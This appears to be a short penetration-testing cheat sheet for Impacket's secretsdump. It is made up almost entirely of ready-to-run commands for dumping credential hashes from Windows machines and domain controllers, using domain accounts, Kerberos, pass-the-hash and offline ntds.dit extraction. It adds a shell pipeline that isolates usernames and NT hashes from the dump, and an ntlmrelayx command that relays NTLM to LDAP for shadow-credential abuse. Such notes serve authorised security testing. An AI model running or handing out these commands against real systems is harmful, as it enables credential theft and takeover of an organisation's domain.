secretsdump

Dump secrets using a domain account

secretsdump.py domain.com/user VICTIM

Dump secrets using Kerberos

secretsdump.py -k -no-pass VICTIM -debug

Dump secrets using a local admin account

secretsdump.py localhost/administrator@host -hashes x:y

Dump secrets out of a ntds.dit file locally

./secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -outputfile MYOUTPUTFILE

Note: don't put .ntds extension on the end of MYOUTPUTFILE.

Dump secrets out of a ntds.dit file locally (with history included)

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile customername-dump -history

Note: don't put .ntds extension on the end of MYOUTPUTFILE.

Parsing a domain's secretsdump outputfile to extract a file with just usernames and hashes while ignoring machines

cat 7MS-DC01_192.168.77.7_2022-12-27_164828.ntds | cut -d ':' -f 1,4 | grep -v '\$' | sed 's/domain.com\\//' | sort 

Run secretsdump against a text file full of machines

Check out this script.

Run secretsdump in docker

docker run -it --rm "impacket:latest"

Run with exposed ports

sudo docker run -it --rm -p 80:80 -p 445:445 -p 443:443 "impacket:latest"
/opt/venv/bin # ./ntlmrelayx.py -t ldap://1.2.3.4 --shadow-credentials

Secretsdump references

Here are some articles that are really awesome to understand secretsdump and it's output:

• Secretsdump demystified
• Windows Services passwords stored in the LSA - by Podalirius